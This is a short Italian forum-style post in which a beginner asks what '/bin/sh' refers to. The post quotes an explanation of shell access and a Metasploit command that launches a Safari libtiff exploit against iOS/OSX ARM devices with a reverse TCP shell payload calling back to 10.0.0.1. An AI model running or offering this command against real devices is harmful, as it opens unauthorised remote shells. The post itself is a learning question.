Ciao a tutti, scusate la domanda banale, mi aiutate a capire cosa identifica

/bin/sh

in un documento ho trovato

<<

This sends /bin/sh to you ... you can do what ever you want after that. If you want to JUST run a command then change your payload....
This is no different than a /bin/sh or bash prompt on any other unix machine.

>>

facendo riferimento a questa stringa

sudo ./msfcli exploit/osx/armle/safari_libtiff PAYLOAD=osx/armle/shell_reverse_tcp LHOST=10.0.0.1 TARGET=1 URIPATH=/pwned SRVPORT=80 E


Grazie mille!!